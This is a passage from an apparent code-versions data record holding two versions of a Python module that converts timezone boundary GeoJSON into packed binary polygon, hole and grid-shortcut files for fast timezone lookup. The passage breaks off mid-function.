print('...Done.\\n\\nComputing where zones start and end...')\n i = 0\n last_id = -1\n for zone_id in poly_zone_ids:\n if zone_id != last_id:\n poly_nr2zone_id.append(i)\n if zone_id < last_id:\n raise ValueError()\n last_id = zone_id\n i += 1\n poly_nr2zone_id.append(i)\n print('...Done.\\n')\n\n\ndef compile_binaries():\n global nr_of_lines\n global shortcuts\n\n def print_shortcut_statistics():\n frequencies = []\n max_val = max(*nr_of_entries_in_shortcut)\n print('shortcut statistics:')\n print('highest entry amount is', max_val)\n while max_val >= 0:\n frequencies.append(nr_of_entries_in_shortcut.count(max_val))\n max_val -= 1\n frequencies.reverse()\n print('frequencies of entry amounts (from 0 to max entries):')\n print(frequencies)\n empty_shortcuts = frequencies[0]\n print('relative accumulated frequencies [%]:')\n acc = accumulated_frequency(frequencies)\n print(acc)\n print([round(100 - x, 2) for x in acc])\n print(percent(empty_shortcuts, amount_of_shortcuts),\n '% of all shortcuts are empty\\n')\n amount_of_different_zones = []\n for entry in shortcut_entries:\n registered_zone_ids = []\n for polygon_nr in entry:\n id = poly_zone_ids[polygon_nr]\n if id not in registered_zone_ids:\n registered_zone_ids.append(id)\n amount_of_different_zones.append(len(registered_zone_ids))\n frequencies = []\n max_val = max(*amount_of_different_zones)\n print('highest amount of different zones in one shortcut is', max_val)\n while max_val >= 1:\n frequencies.append(amount_of_different_zones.count(max_val))\n max_val -= 1\n frequencies.append(empty_shortcuts)\n frequencies.reverse()\n print('frequencies of entry amounts (from 0 to max):')\n print(frequencies)\n print('relative accumulated frequencies [%]:')\n acc = accumulated_frequency(frequencies)\n print(acc)\n print([round(100 - x, 2) for x in acc])\n print('--------------------------------\\n')\n\n def included_shortcut_row_nrs(max_lat, min_lat):\n return list(range(y_shortcut(max_lat), y_shortcut(min_lat) + 1))\n\n def included_shortcut_column_nrs(max_lng, min_lng):\n return list(range(x_shortcut(min_lng), x_shortcut(max_lng) + 1))\n\n def longitudes_to_check(max_lng, min_lng):\n output_list = []\n step = 1 / NR_SHORTCUTS_PER_LNG\n current = ceil(min_lng * NR_SHORTCUTS_PER_LNG) / NR_SHORTCUTS_PER_LNG\n end = floor(max_lng * NR_SHORTCUTS_PER_LNG) / NR_SHORTCUTS_PER_LNG\n while current < end:\n output_list.append(current)\n current += step\n output_list.append(end)\n return 
output_list\n\n def latitudes_to_check(max_lat, min_lat):\n output_list = []\n step = 1 / NR_SHORTCUTS_PER_LAT\n current = ceil(min_lat * NR_SHORTCUTS_PER_LAT) / NR_SHORTCUTS_PER_LAT\n end = floor(max_lat * NR_SHORTCUTS_PER_LAT) / NR_SHORTCUTS_PER_LAT\n while current < end:\n output_list.append(current)\n current += step\n output_list.append(end)\n return output_list\n\n def compute_x_intersection(y, x1, x2, y1, y2):\n \"\"\"returns the x intersection from a horizontal line in y with the line from x1,y1 to x1,y2\n \"\"\"\n delta_y = y2 - y1\n if delta_y == 0:\n return x1\n return (y - y1) * (x2 - x1) / delta_y + x1\n\n def compute_y_intersection(x, x1, x2, y1, y2):\n \"\"\"returns the y intersection from a vertical line in x with the line from x1,y1 to x1,y2\n \"\"\"\n delta_x = x2 - x1\n if delta_x == 0:\n return x1\n return (x - x1) * (y2 - y1) / delta_x + y1\n\n def x_intersections(y, x_coords, y_coords):\n intersects = []\n for i in range(len(y_coords) - 1):\n iplus1 = i + 1\n if y_coords[i] <= y:\n if y_coords[iplus1] > y:\n intersects.append(compute_x_intersection(y, x_coords[i],\n x_coords[iplus1], y_coords[i], y_coords[iplus1]))\n elif y_coords[iplus1] <= y:\n intersects.append(compute_x_intersection(y, x_coords[i],\n x_coords[iplus1], y_coords[i], y_coords[iplus1]))\n return intersects\n\n def y_intersections(x, x_coords, y_coords):\n intersects = []\n for i in range(len(y_coords) - 1):\n iplus1 = i + 1\n if x_coords[i] <= x:\n if x_coords[iplus1] > x:\n intersects.append(compute_y_intersection(x, x_coords[i],\n x_coords[iplus1], y_coords[i], y_coords[iplus1]))\n elif x_coords[iplus1] <= x:\n intersects.append(compute_y_intersection(x, x_coords[i],\n x_coords[iplus1], y_coords[i], y_coords[iplus1]))\n return intersects\n\n def compute_exact_shortcuts(xmax, xmin, ymax, ymin, line):\n shortcuts_for_line = set()\n x_longs, y_longs = ints_of(line)\n y_longs.append(y_longs[0])\n x_longs.append(x_longs[0])\n step = 1 / NR_SHORTCUTS_PER_LAT\n for lat in latitudes_to_check(ymax, ymin):\n intersects = sorted([int2coord(x) for x in x_intersections(\n coord2int(lat), x_longs, y_longs)])\n nr_of_intersects = len(intersects)\n if nr_of_intersects % 2 != 0:\n raise ValueError(\n 'an uneven number of intersections has been accounted')\n for i in range(0, nr_of_intersects, 2):\n possible_longitudes = []\n iplus = i + 1\n intersection_in = intersects[i]\n intersection_out = intersects[iplus]\n if intersection_in == intersection_out:\n if contained(coord2int(intersection_in), coord2int(lat) +\n 1, x_longs, y_longs):\n shortcuts_for_line.add((x_shortcut(intersection_in),\n y_shortcut(lat) - 1))\n shortcuts_for_line.add((x_shortcut(intersection_in),\n y_shortcut(lat)))\n else:\n possible_y_shortcut = y_shortcut(lat)\n middle = intersection_in + (intersection_out -\n intersection_in) / 2\n if contained(coord2int(middle), coord2int(lat) + 1,\n x_longs, y_longs):\n while intersection_in < intersection_out:\n possible_longitudes.append(intersection_in)\n intersection_in += step\n possible_longitudes.append(intersection_out)\n possible_y_shortcut_min1 = possible_y_shortcut - 1\n for possible_x_coord in possible_longitudes:\n shortcuts_for_line.add((x_shortcut(\n possible_x_coord), possible_y_shortcut))\n shortcuts_for_line.add((x_shortcut(\n possible_x_coord), possible_y_shortcut_min1))\n else:\n while intersection_in < intersection_out:\n possible_longitudes.append(intersection_in)\n intersection_in += step\n possible_longitudes.append(intersection_out)\n for possible_x_coord in possible_longitudes:\n 
shortcuts_for_line.add((x_shortcut(\n possible_x_coord), possible_y_shortcut))\n step = 1 / NR_SHORTCUTS_PER_LAT\n for lng in longitudes_to_check(xmax, xmin):\n intersects = sorted([int2coord(y) for y in y_intersections(\n coord2int(lng), x_longs, y_longs)])\n nr_of_intersects = len(intersects)\n if nr_of_intersects % 2 != 0:\n raise ValueError(\n 'an uneven number of intersections has been accounted')\n possible_latitudes = []\n for i in range(0, nr_of_intersects, 2):\n iplus = i + 1\n intersection_in = intersects[i]\n intersection_out = intersects[iplus]\n if intersection_in == intersection_out:\n if contained(coord2int(lng) - 1, coord2int(\n intersection_in), x_longs, y_longs):\n shortcuts_for_line.add((x_shortcut(lng) - 1,\n y_shortcut(intersection_in)))\n shortcuts_for_line.add((x_shortcut(lng), y_shortcut(\n intersection_in)))\n else:\n possible_x_shortcut = x_shortcut(lng)\n middle = intersection_in + (intersection_out -\n intersection_in) / 2\n if contained(coord2int(lng) - 1, coord2int(middle),\n x_longs, y_longs):\n while intersection_in < intersection_out:\n possible_latitudes.append(intersection_in)\n intersection_in += step\n possible_latitudes.append(intersection_out)\n possible_x_shortcut_min1 = possible_x_shortcut - 1\n for possible_latitude in possible_latitudes:\n shortcuts_for_line.add((possible_x_shortcut,\n y_shortcut(possible_latitude)))\n shortcuts_for_line.add((\n possible_x_shortcut_min1, y_shortcut(\n possible_latitude)))\n else:\n while intersection_in < intersection_out:\n possible_latitudes.append(intersection_in)\n intersection_in += step\n possible_latitudes.append(intersection_out)\n for possible_latitude in possible_latitudes:\n shortcuts_for_line.add((possible_x_shortcut,\n y_shortcut(possible_latitude)))\n return shortcuts_for_line\n\n def construct_shortcuts():\n print('building shortucts...')\n print('currently at polygon nr:')\n line = 0\n for xmax, xmin, ymax, ymin in all_boundaries:\n if line % 100 == 0:\n print(line)\n column_nrs = included_shortcut_column_nrs(xmax, xmin)\n row_nrs = included_shortcut_row_nrs(ymax, ymin)\n if big_zone(xmax, xmin, ymax, ymin):\n shortcuts_for_line = compute_exact_shortcuts(xmax, xmin,\n ymax, ymin, line)\n min_x_shortcut = column_nrs[0]\n max_x_shortcut = column_nrs[-1]\n min_y_shortcut = row_nrs[0]\n max_y_shortcut = row_nrs[-1]\n shortcuts_to_remove = []\n for x, y in shortcuts_for_line:\n if (x < min_x_shortcut or x > max_x_shortcut or y <\n min_y_shortcut or y > max_y_shortcut):\n shortcuts_to_remove.append((x, y))\n for s in shortcuts_to_remove:\n shortcuts_for_line.remove(s)\n if len(shortcuts_for_line) > len(column_nrs) * len(row_nrs):\n raise ValueError(\n 'there are more shortcuts than before now. there is something wrong with the algorithm!'\n )\n if len(shortcuts_for_line) < 3:\n raise ValueError(\n 'algorithm not valid! 
less than 3 zones detected (should be at least 3)'\n )\n else:\n shortcuts_for_line = []\n for column_nr in column_nrs:\n for row_nr in row_nrs:\n shortcuts_for_line.append((column_nr, row_nr))\n for shortcut in shortcuts_for_line:\n shortcuts[shortcut] = shortcuts.get(shortcut, []) + [line]\n line += 1\n start_time = datetime.now()\n construct_shortcuts()\n end_time = datetime.now()\n print('calculating the shortcuts took:', end_time - start_time, '\\n')\n nr_of_floats = 2 * sum(all_lengths)\n nr_of_entries_in_shortcut = []\n shortcut_entries = []\n amount_filled_shortcuts = 0\n\n def sort_poly_shortcut(poly_nrs):\n polygon_ids = [poly_zone_ids[poly_nr] for poly_nr in poly_nrs]\n id_freq = [polygon_ids.count(id) for id in polygon_ids]\n zipped = list(zip(poly_nrs, polygon_ids, id_freq))\n sort = sorted(sorted(zipped, key=lambda x: x[1]), key=lambda x: x[2])\n return [x[0] for x in sort]\n for x in range(360 * NR_SHORTCUTS_PER_LNG):\n for y in range(180 * NR_SHORTCUTS_PER_LAT):\n try:\n shortcuts_this_entry = shortcuts[x, y]\n shortcut_entries.append(sort_poly_shortcut(\n shortcuts_this_entry))\n amount_filled_shortcuts += 1\n nr_of_entries_in_shortcut.append(len(shortcuts_this_entry))\n except KeyError:\n nr_of_entries_in_shortcut.append(0)\n amount_of_shortcuts = len(nr_of_entries_in_shortcut)\n print_shortcut_statistics()\n if (amount_of_shortcuts != 360 * 180 * NR_SHORTCUTS_PER_LNG *\n NR_SHORTCUTS_PER_LAT):\n print(amount_of_shortcuts)\n raise ValueError('this number of shortcut zones is wrong')\n print('The number of filled shortcut zones are:',\n amount_filled_shortcuts, '(=', round(amount_filled_shortcuts /\n amount_of_shortcuts * 100, 2), '% of all shortcuts)')\n shortcut_space = (360 * NR_SHORTCUTS_PER_LNG * 180 *\n NR_SHORTCUTS_PER_LAT * (NR_BYTES_H + NR_BYTES_I))\n for nr in nr_of_entries_in_shortcut:\n shortcut_space += NR_BYTES_H * nr\n print('The number of polygons is:', nr_of_lines)\n print('The number of floats in all the polygons is (2 per point):',\n nr_of_floats)\n path = 'poly_nr2zone_id.bin'\n print('writing file', path)\n output_file = open(path, 'wb')\n for zone_id in poly_nr2zone_id:\n output_file.write(pack(b'<H', zone_id))\n output_file.close()\n print('Done\\n')\n path = 'poly_zone_ids.bin'\n print('writing file \"', path, '\"')\n output_file = open(path, 'wb')\n for zone_id in poly_zone_ids:\n output_file.write(pack(b'<H', zone_id))\n output_file.close()\n path = 'poly_max_values.bin'\n print('writing file \"', path, '\"')\n output_file = open(path, 'wb')\n for xmax, xmin, ymax, ymin in all_boundaries:\n output_file.write(pack(b'<iiii', coord2int(xmax), coord2int(xmin),\n coord2int(ymax), coord2int(ymin)))\n output_file.close()\n path = 'poly_data.bin'\n print('writing file \"', path, '\"')\n output_file = open(path, 'wb')\n addresses = []\n i = 0\n for x_coords, y_coords in all_coords:\n addresses.append(output_file.tell())\n if all_lengths[i] != len(x_coords):\n raise ValueError('x_coords do not have the expected length!',\n all_lengths[i], len(x_coords))\n for x in x_coords:\n output_file.write(pack(b'<i', coord2int(x)))\n for y in y_coords:\n output_file.write(pack(b'<i', coord2int(y)))\n i += 1\n output_file.close()\n path = 'poly_adr2data.bin'\n print('writing file \"', path, '\"')\n output_file = open(path, 'wb')\n for adr in addresses:\n output_file.write(pack(b'<I', adr))\n output_file.close()\n path = 'poly_coord_amount.bin'\n print('writing file \"', path, '\"')\n output_file = open(path, 'wb')\n for length in all_lengths:\n 
output_file.write(pack(b'<I', length))\n output_file.close()\n path = 'shortcuts_entry_amount.bin'\n print('writing file \"', path, '\"')\n output_file = open(path, 'wb')\n for nr in nr_of_entries_in_shortcut:\n if nr > 300:\n raise ValueError('There are too many polygons in this shortcut:',\n nr)\n output_file.write(pack(b'<H', nr))\n output_file.close()\n adr = 0\n path = 'shortcuts_adr2data.bin'\n print('writing file \"', path, '\"')\n output_file = open(path, 'wb')\n for nr in nr_of_entries_in_shortcut:\n if nr == 0:\n output_file.write(pack(b'<I', 0))\n else:\n output_file.write(pack(b'<I', adr))\n adr += 2 * nr\n output_file.close()\n path = 'shortcuts_data.bin'\n print('writing file \"', path, '\"')\n output_file = open(path, 'wb')\n for entries in shortcut_entries:\n for entry in entries:\n if entry > nr_of_lines:\n raise ValueError(entry)\n output_file.write(pack(b'<H', entry))\n output_file.close()\n path = 'shortcuts_unique_id.bin'\n print('writing file \"', path, '\"')\n output_file = open(path, 'wb')\n if poly_zone_ids[-1] >= INVALID_ZONE_ID:\n raise ValueError(\n 'There are too many zones for this data type (H). The shortcuts_unique_id file need a Invalid Id!'\n )\n for x in range(360 * NR_SHORTCUTS_PER_LNG):\n for y in range(180 * NR_SHORTCUTS_PER_LAT):\n try:\n shortcuts_this_entry = shortcuts[x, y]\n unique_id = poly_zone_ids[shortcuts_this_entry[0]]\n for nr in shortcuts_this_entry:\n if poly_zone_ids[nr] != unique_id:\n unique_id = INVALID_ZONE_ID\n break\n output_file.write(pack(b'<H', unique_id))\n except KeyError:\n output_file.write(pack(b'<H', INVALID_ZONE_ID))\n output_file.close()\n hole_space = 0\n path = 'hole_poly_ids.bin'\n print('writing file \"', path, '\"')\n output_file = open(path, 'wb')\n i = 0\n for line in polynrs_of_holes:\n if line > nr_of_lines:\n raise ValueError(line, nr_of_lines)\n output_file.write(pack(b'<H', line))\n i += 1\n hole_space += output_file.tell()\n output_file.close()\n if i > amount_of_holes:\n raise ValueError('There are more related lines than holes.')\n path = 'hole_coord_amount.bin'\n print('writing file \"', path, '\"')\n output_file = open(path, 'wb')\n for length in all_hole_lengths:\n output_file.write(pack(b'<H', length))\n hole_space += output_file.tell()\n output_file.close()\n adr = 0\n path = 'hole_adr2data.bin'\n print('writing file \"', path, '\"')\n output_file = open(path, 'wb')\n for length in all_hole_lengths:\n output_file.write(pack(b'<I', adr))\n adr += 2 * NR_BYTES_I * length\n hole_space += output_file.tell()\n output_file.close()\n path = 'hole_data.bin'\n print('writing file \"', path, '\"')\n output_file = open(path, 'wb')\n for x_coords, y_coords in all_holes:\n for x in x_coords:\n output_file.write(pack(b'<i', coord2int(x)))\n for y in y_coords:\n output_file.write(pack(b'<i', coord2int(y)))\n hole_space += output_file.tell()\n output_file.close()\n polygon_space = nr_of_floats * NR_BYTES_I\n total_space = polygon_space + hole_space + shortcut_space\n print('the polygon data makes up', percent(polygon_space, total_space),\n '% of the data')\n print('the shortcuts make up', percent(shortcut_space, total_space),\n '% of the data')\n print('holes make up', percent(hole_space, total_space), '% of the data')\n print('Success!')\n return\n\n\n<mask token>\n",
"step-5": "# -*- coding:utf-8 -*-\nimport json\nfrom datetime import datetime\nfrom math import ceil, floor\nfrom os.path import abspath, join, pardir\nfrom struct import pack\n\nfrom .global_settings import (\n DEBUG, DEBUG_POLY_STOP, INPUT_JSON_FILE_NAME, INVALID_ZONE_ID, NR_BYTES_H, NR_BYTES_I, NR_SHORTCUTS_PER_LAT,\n NR_SHORTCUTS_PER_LNG, TIMEZONE_NAMES_FILE,\n)\n# # # keep in mind: the faster numba optimized helper fct. cannot be used here,\n# # # because numpy classes are not being used at this stage yet!\nfrom .helpers import coord2int, inside_polygon, int2coord\n\n# from helpers import coord2int, inside_polygon, int2coord\n# from global_settings import (\n# DEBUG, DEBUG_POLY_STOP, INPUT_JSON_FILE_NAME, INVALID_ZONE_ID, NR_BYTES_H, NR_BYTES_I, NR_SHORTCUTS_PER_LAT,\n# NR_SHORTCUTS_PER_LNG, TIMEZONE_NAMES_FILE,\n# )\n\n\n# import sys\n# from os.path import dirname\n#\n# sys.path.insert(0, dirname(__file__))\n# from helpers import coord2int, int2coord, inside_polygon\n\n\n\"\"\"\nTODO write tests\n\nUSE INSTRUCTIONS:\n\n- download the latest timezones.geojson.zip file from github.com/evansiroky/timezone-boundary-builder/releases\n- unzip and place the combined.json inside this timezonefinder folder\n- run this file_converter.py as a script until the compilation of the binary files is completed.\n\n\nIMPORTANT: all coordinates (floats) are being converted to int32 (multiplied by 10^7). This makes computations faster\nand it takes lot less space, without loosing too much accuracy (min accuracy (=at the equator) is still 1cm !)\n\nB = unsigned char (1byte = 8bit Integer)\nH = unsigned short (2 byte integer)\nI = unsigned 4byte integer\ni = signed 4byte integer\n\n\nBinaries being written:\n\n[POLYGONS:] there are approx. 1k Polygons (evansiroky/timezone-boundary-builder 2017a)\npoly_zone_ids: the related zone_id for every polygon ('<H')\npoly_coord_amount: the amount of coordinates in every polygon ('<I')\npoly_adr2data: address in poly_data.bin where data for every polygon starts ('<I')\npoly_max_values: boundaries for every polygon ('<iiii': xmax, xmin, ymax, ymin)\npoly_data: coordinates for every polygon (multiple times '<i') (for every polygon first all x then all y values!)\npoly_nr2zone_id: the polygon number of the first polygon from every zone('<H')\n\n[HOLES:] number of holes (162 evansiroky/timezone-boundary-builder 2018d)\nhole_poly_ids: the related polygon_nr (=id) for every hole ('<H')\nhole_coord_amount: the amount of coordinates in every hole ('<H')\nhole_adr2data: address in hole_data.bin where data for every hole starts ('<I')\nhole_data: coordinates for every hole (multiple times '<i')\n\n[SHORTCUTS:] the surface of the world is split up into a grid of shortcut rectangles.\n-> there are a total of 360 * NR_SHORTCUTS_PER_LNG * 180 * NR_SHORTCUTS_PER_LAT shortcuts\nshortcut here means storing for every cell in a grid of the world map which polygons are located in that cell\nthey can therefore be used to drastically reduce the amount of polygons which need to be checked in order to\ndecide which timezone a point is located in.\n\nthe list of polygon ids in each shortcut is sorted after freq. 
of appearance of their zone id\nthis is critical for ruling out zones faster (as soon as just polygons of one zone are left this zone can be returned)\n\nshortcuts_entry_amount: the amount of polygons for every shortcut ('<H')\nshortcuts_adr2data: address in shortcut_data.bin where data for every shortcut starts ('<I')\nshortcuts_data: polygon numbers (ids) for every shortcut (multiple times '<H')\nshortcuts_unique_id: the zone id if only polygons from one zone are present,\n a high number (with no corresponding zone) if not ('<H').\n the majority of zones either have no polygons at all (sea) or just one zone.\n this zone then can be instantly returned without actually testing polygons.\n\nalso stored extra binary if only one zone (to directly return that zone without checking)\n\n\n\nstatistics: (data version 2018g)\n\n\nmaximal amount of coordinates in one polygon: 139130\namount_of_holes: 219\namount of polygons: 1177\n\nshortcut statistics:\nhighest entry amount is 46\nfrequencies of entry amounts (from 0 to max entries):\n[76359, 45216, 7204, 710, 81, 17, 4, 1, 3, 0, 0, 0, 1, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0,\n 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1]\nrelative accumulated frequencies [%]:\n[58.92, 93.81, 99.37, 99.91, 99.98, 99.99, 99.99, 99.99, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0,\n 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0,\n 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0]\n[41.08, 6.19, 0.63, 0.09, 0.02, 0.01, 0.01, 0.01, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0]\n58.92 % of all shortcuts are empty\n\nhighest amount of different zones in one shortcut is 7\nfrequencies of entry amounts (from 0 to max):\n[76359, 45555, 6963, 672, 43, 6, 1, 1]\nrelative accumulated frequencies [%]:\n[58.92, 94.07, 99.44, 99.96, 99.99, 100.0, 100.0, 100.0]\n[41.08, 5.93, 0.56, 0.04, 0.01, 0.0, 0.0, 0.0]\n--------------------------------\n\nThe number of filled shortcut zones are: 53241 (= 41.08 % of all shortcuts)\nThe number of polygons is: 1177\nThe number of floats in all the polygons is (2 per point): 10887056\nwriting file \" poly_nr2zone_id.bin \"\nDone\n\nwriting file \" poly_zone_ids.bin \"\nwriting file \" poly_max_values.bin \"\nwriting file \" poly_data.bin \"\nwriting file \" poly_adr2data.bin \"\nwriting file \" poly_coord_amount.bin \"\nwriting file \" shortcuts_entry_amount.bin \"\nwriting file \" shortcuts_adr2data.bin \"\nwriting file \" shortcuts_data.bin \"\nwriting file \" shortcuts_unique_id.bin \"\nwriting file \" hole_poly_ids.bin \"\nwriting file \" hole_coord_amount.bin \"\nwriting file \" hole_adr2data.bin \"\nwriting file \" hole_data.bin \"\nthe polygon data makes up 97.11 % of the data\nthe shortcuts make up 2.01 % of the data\nholes make up 0.88 % of the data\n\"\"\"\n\nnr_of_lines = -1\nall_tz_names = []\npoly_zone_ids = []\nall_boundaries = []\nall_coords = []\nall_lengths = []\namount_of_holes = 0\npolynrs_of_holes = []\nall_holes = []\nall_hole_lengths = []\nlist_of_pointers = []\npoly_nr2zone_id = []\nshortcuts = {}\n\n\ndef x_shortcut(lng):\n # higher (=lng) means higher x shortcut!!! 
0 (-180deg lng) -> 360 (180deg)\n # if lng < -180 or lng >= 180:\n # raise ValueError('longitude out of bounds', lng)\n return floor((lng + 180) * NR_SHORTCUTS_PER_LNG)\n\n\ndef y_shortcut(lat):\n # lower y (=lat) means higher y shortcut!!! 0 (90deg lat) -> 180 (-90deg)\n # if lat < -90 or lat >= 90:\n # raise ValueError('this latitude is out of bounds', lat)\n return floor((90 - lat) * NR_SHORTCUTS_PER_LAT)\n\n\ndef big_zone(xmax, xmin, ymax, ymin):\n # returns True if a zone with those boundaries could have more than 4 shortcuts\n return xmax - xmin > 2 / NR_SHORTCUTS_PER_LNG and ymax - ymin > 2 / NR_SHORTCUTS_PER_LAT\n\n\ndef percent(numerator, denominator):\n return round((numerator / denominator) * 100, 2)\n\n\ndef accumulated_frequency(int_list):\n out = []\n total = sum(int_list)\n acc = 0\n for e in int_list:\n acc += e\n out.append(percent(acc, total))\n\n return out\n\n\ndef ints_of(line=0):\n x_coords, y_coords = all_coords[line]\n return [coord2int(x) for x in x_coords], [coord2int(x) for x in y_coords]\n\n\ndef contained(x, y, x_coords, y_coords):\n return inside_polygon(x, y, [x_coords, y_coords])\n\n\ndef unique(iterable):\n out = []\n for i in iterable:\n if i not in out:\n out.append(i)\n return out\n\n\ndef point_between(p1, p2):\n return p1[0] + (p2[0] - p1[0]) / 2, p1[1] + (p2[1] - p1[1]) / 2\n\n\ndef get_shortcuts(x, y):\n result = shortcuts.get((x, y))\n if result is None:\n return []\n else:\n return result\n\n\ndef _polygons(id_list):\n for i in id_list:\n yield all_coords[i]\n\n\ndef not_empty(iterable):\n for i in iterable:\n return True\n return False\n\n\ndef polys_of_one_zone():\n for i in range(len(timezone_names)):\n start = poly_nr2zone_id[i]\n end = poly_nr2zone_id[i + 1]\n yield list(range(start, end))\n\n\ndef replace_entry(iterable, entry, substitute):\n for i in range(len(iterable)):\n if iterable[i] == entry:\n iterable[i] = substitute\n return iterable\n\n\ndef _holes_in_poly(poly_nr):\n i = 0\n for nr in polynrs_of_holes:\n if nr == poly_nr:\n yield all_holes[i]\n i += 1\n\n\ndef parse_polygons_from_json(path=INPUT_JSON_FILE_NAME):\n global amount_of_holes\n global nr_of_lines\n global poly_zone_ids\n\n print('Parsing data from {}\\nthis could take a while...\\n'.format(path))\n tz_list = json.loads(open(path).read()).get('features')\n # this counter just counts polygons, not holes!\n polygon_counter = 0\n current_zone_id = 0\n print('holes found at: (poly_nr zone_name)')\n for tz_dict in tz_list:\n if DEBUG and polygon_counter > DEBUG_POLY_STOP:\n break\n\n tz_name = tz_dict.get('properties').get(\"tzid\")\n # print(tz_name)\n all_tz_names.append(tz_name)\n geometry = tz_dict.get(\"geometry\")\n if geometry.get('type') == 'MultiPolygon':\n # depth is 4\n multipolygon = geometry.get(\"coordinates\")\n else:\n # depth is 3 (only one polygon, possibly with holes!)\n multipolygon = [geometry.get(\"coordinates\")]\n # multipolygon has depth 4\n # assert depth_of_array(multipolygon) == 4\n for poly_with_hole in multipolygon:\n # assert len(poly_with_hole) > 0\n # the first entry is polygon\n x_coords, y_coords = list(zip(*poly_with_hole.pop(0)))\n # IMPORTANT: do not use the last value (is equal to the first)!\n x_coords = list(x_coords)\n y_coords = list(y_coords)\n x_coords.pop(-1)\n y_coords.pop(-1)\n all_coords.append((x_coords, y_coords))\n # assert len(x_coords) > 0\n all_lengths.append(len(x_coords))\n all_boundaries.append((max(x_coords), min(x_coords), max(y_coords), min(y_coords)))\n poly_zone_ids.append(current_zone_id)\n\n # everything else is 
interpreted as a hole!\n for hole in poly_with_hole:\n print(polygon_counter, tz_name)\n # keep track of how many holes there are\n amount_of_holes += 1\n polynrs_of_holes.append(polygon_counter)\n x_coords, y_coords = list(zip(*hole))\n # IMPORTANT: do not use the last value (is equal to the first)!\n x_coords = list(x_coords)\n y_coords = list(y_coords)\n x_coords.pop(-1)\n y_coords.pop(-1)\n all_holes.append((x_coords, y_coords))\n all_hole_lengths.append(len(x_coords))\n\n polygon_counter += 1\n\n current_zone_id += 1\n\n if max(all_lengths) >= 2 ** (8 * NR_BYTES_I):\n # 34621 in tz_world 2016d (small enough for int16)\n # 137592 in evansiroky/timezone-boundary-builder 2017a (now int32 is needed!)\n raise ValueError('amount of coords cannot be represented by int32 in poly_coord_amount.bin:',\n max(all_lengths))\n\n if max(all_hole_lengths) >= 2 ** (8 * NR_BYTES_H):\n # 21071 in evansiroky/timezone-boundary-builder 2017a (int16 still enough)\n raise ValueError('amount of coords cannot be represented by short (int16) in hole_coord_amount.bin:',\n max(all_hole_lengths))\n\n nr_of_lines = len(all_lengths)\n if polygon_counter != nr_of_lines:\n raise ValueError('polygon counter and entry number in all_length is different:', polygon_counter, nr_of_lines)\n\n if nr_of_lines >= 2 ** (8 * NR_BYTES_H):\n # 24k in tz_world 2016d\n # 1022 in evansiroky/timezone-boundary-builder 2017a\n raise ValueError('polygon id cannot be encoded as short (int16) in hole_coord_amount.bin! there are',\n nr_of_lines, 'polygons')\n\n if poly_zone_ids[-1] > 2 ** (8 * NR_BYTES_H):\n # 420 different zones in evansiroky/timezone-boundary-builder 2017a\n # used in shortcuts_unique_id and poly_zone_ids\n raise ValueError('zone id cannot be encoded as char (int8). the last id is',\n poly_zone_ids[-1])\n\n if 0 in all_lengths:\n raise ValueError()\n\n print('... 
parsing done.')\n print('maximal amount of coordinates in one polygon:', max(all_lengths))\n print('amount_of_holes:', amount_of_holes)\n print('amount of polygons:', nr_of_lines)\n print('\\n')\n\n\ndef update_zone_names(path=TIMEZONE_NAMES_FILE):\n global poly_zone_ids\n global list_of_pointers\n global all_boundaries\n global all_coords\n global all_lengths\n global polynrs_of_holes\n print('updating the zone names in {} now...'.format(path))\n # pickle the zone names (python array)\n with open(abspath(path), 'w') as f:\n f.write(json.dumps(all_tz_names))\n print('...Done.\\n\\nComputing where zones start and end...')\n i = 0\n last_id = -1\n for zone_id in poly_zone_ids:\n if zone_id != last_id:\n poly_nr2zone_id.append(i)\n if zone_id < last_id:\n raise ValueError()\n last_id = zone_id\n i += 1\n poly_nr2zone_id.append(i)\n print('...Done.\\n')\n\n\ndef compile_binaries():\n global nr_of_lines\n global shortcuts\n\n def print_shortcut_statistics():\n frequencies = []\n max_val = max(*nr_of_entries_in_shortcut)\n print('shortcut statistics:')\n print('highest entry amount is', max_val)\n while max_val >= 0:\n frequencies.append(nr_of_entries_in_shortcut.count(max_val))\n max_val -= 1\n\n frequencies.reverse()\n print('frequencies of entry amounts (from 0 to max entries):')\n print(frequencies)\n empty_shortcuts = frequencies[0]\n print('relative accumulated frequencies [%]:')\n acc = accumulated_frequency(frequencies)\n print(acc)\n print([round(100 - x, 2) for x in acc])\n print(percent(empty_shortcuts, amount_of_shortcuts), '% of all shortcuts are empty\\n')\n\n amount_of_different_zones = []\n for entry in shortcut_entries:\n registered_zone_ids = []\n for polygon_nr in entry:\n id = poly_zone_ids[polygon_nr]\n if id not in registered_zone_ids:\n registered_zone_ids.append(id)\n\n amount_of_different_zones.append(len(registered_zone_ids))\n\n frequencies = []\n max_val = max(*amount_of_different_zones)\n print('highest amount of different zones in one shortcut is', max_val)\n while max_val >= 1:\n frequencies.append(amount_of_different_zones.count(max_val))\n max_val -= 1\n # show the proper amount of shortcuts with 0 zones (=nr of empty shortcuts)\n frequencies.append(empty_shortcuts)\n frequencies.reverse()\n print('frequencies of entry amounts (from 0 to max):')\n print(frequencies)\n print('relative accumulated frequencies [%]:')\n acc = accumulated_frequency(frequencies)\n print(acc)\n print([round(100 - x, 2) for x in acc])\n print('--------------------------------\\n')\n\n def included_shortcut_row_nrs(max_lat, min_lat):\n return list(range(y_shortcut(max_lat), y_shortcut(min_lat) + 1))\n\n def included_shortcut_column_nrs(max_lng, min_lng):\n return list(range(x_shortcut(min_lng), x_shortcut(max_lng) + 1))\n\n def longitudes_to_check(max_lng, min_lng):\n output_list = []\n step = 1 / NR_SHORTCUTS_PER_LNG\n current = ceil(min_lng * NR_SHORTCUTS_PER_LNG) / NR_SHORTCUTS_PER_LNG\n end = 